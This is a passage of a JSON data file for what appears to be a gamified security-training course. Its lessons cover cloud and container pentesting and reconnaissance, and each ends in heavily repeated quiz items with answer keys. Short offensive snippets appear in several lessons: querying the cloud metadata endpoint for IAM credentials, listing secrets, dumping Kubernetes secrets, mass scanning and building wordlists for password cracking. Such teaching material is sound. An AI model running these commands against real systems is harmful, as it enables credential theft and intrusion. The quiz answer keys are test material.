Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-gcp","cat":"Cloud & Container","title":"GCP Penetration Testing","diff":3,"xp":200,"intro":"Attack Google Cloud Platform.","sections":[{"type":"text","content":"Service account keys, IAM roles, public buckets, Cloud Functions."},{"type":"code","lang":"bash","content":"gcloud auth list\ngcloud compute instances list\ngsutil ls gs://target-data/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GCP metadata requires which header?","opts":["Authorization","Metadata-Flavor: Google","Content-Type","X-API-Key"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-ssrf-chain","cat":"Cloud & Container","title":"Cloud SSRF to Account Compromise","diff":4,"xp":300,"intro":"Chain SSRF through metadata to full access.","sections":[{"type":"text","content":"Steal IAM creds from metadata, enumerate, pivot to other services."},{"type":"code","lang":"bash","content":"curl 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'\nexport AWS_ACCESS_KEY_ID=ASIA...\naws secretsmanager list-secrets"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud SSRF escalation starts with...","opts":["Port scanning","Stealing IAM creds from metadata","Brute force","Social engineering"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-supply-chain","cat":"Cloud & Container","title":"Container Supply Chain","diff":5,"xp":300,"intro":"Poison images, inject layers, compromise CI/CD.","sections":[{"type":"text","content":"Typosquatting, compromised base images, pipeline injection."},{"type":"code","lang":"bash","content":"# Pin to digest: FROM python@sha256:abc123\n# Scan: trivy image myapp:latest\n# CI/CD: review .github/workflows/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Supply chain attacks target...","opts":["Runtime","The build process: images, CI/CD, dependencies","Network config","K8s API"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-eks","cat":"Cloud & Container","title":"AWS EKS Pentesting","diff":4,"xp":300,"intro":"Compromise managed Kubernetes on AWS.","sections":[{"type":"text","content":"Enumerate via AWS API, get kubeconfig, check RBAC, escape to node."},{"type":"code","lang":"bash","content":"aws eks list-clusters\naws eks update-kubeconfig --name cluster\nkubectl auth can-i --list\nkubectl get secrets -A"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"After EKS node access, target...","opts":["Other clusters","Node's IAM role via IMDS","Internet","DNS"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-azure-ad","cat":"Cloud & Container","title":"Azure AD Advanced Attacks","diff":5,"xp":300,"intro":"OAuth app abuse, PRT theft, conditional access bypass.","sections":[{"type":"text","content":"Illicit consent grants, Primary Refresh Tokens, legacy auth bypass."},{"type":"code","lang":"bash","content":"# Illicit consent: app requesting Mail.Read + Files.ReadWrite.All\n# PRT: mimikatz token extraction\n# Legacy auth bypass: IMAP/POP bypass MFA"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Illicit consent tricks users into...","opts":["Downloading malware","Granting an app access to their data","Changing passwords","Disabling MFA"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"r-masscan2","cat":"Reconnaissance","title":"Masscan Internet Scanning","diff":2,"xp":150,"intro":"Masscan scans millions of IPs per second.","sections":[{"type":"text","content":"Masscan uses raw SYN packets with its own TCP stack for speed. Use it for broad discovery, then nmap for detailed follow-up."},{"type":"code","lang":"bash","content":"masscan 10.0.0.0/16 -p80,443,22 --rate=10000\nmasscan target -p1-65535 --rate=1000"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Masscan is faster than nmap because it...","opts":["Uses UDP","Uses a custom TCP stack for raw SYN packets","Scans fewer ports","Uses threads"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-wappalyzer","cat":"Reconnaissance","title":"Technology Fingerprinting","diff":1,"xp":75,"intro":"Identify what technologies a website uses.","sections":[{"type":"text","content":"Wappalyzer, BuiltWith, and WhatWeb detect CMS, frameworks, JS libraries, CDN, and server software from HTTP responses."},{"type":"code","lang":"bash","content":"whatweb target.com\nwappalyzer https://target.com\ncurl -s target.com | grep -oiE 'wordpress|drupal|react|angular|vue|jquery'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Technology fingerprinting helps attackers...","opts":["Nothing","Find version-specific vulnerabilities","Slow down scanning","Encrypt traffic"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cewl-wordlist","cat":"Reconnaissance","title":"Custom Wordlist Generation","diff":2,"xp":150,"intro":"Build target-specific wordlists from their own content.","sections":[{"type":"text","content":"CeWL crawls a website and extracts words to build a custom wordlist. Combined with the target's name, industry terms, and mutation rules, it's far more effective than generic lists."},{"type":"code","lang":"bash","content":"cewl https://target.com -d 3 -m 5 -w custom-wordlist.txt\n# Add mutations\njohn --wordlist=custom-wordlist.txt --rules --stdout > mutated.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Custom wordlists are better because...","opts":["They're longer","They contain words specific to the target's context","They're encrypted","They're faster"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon 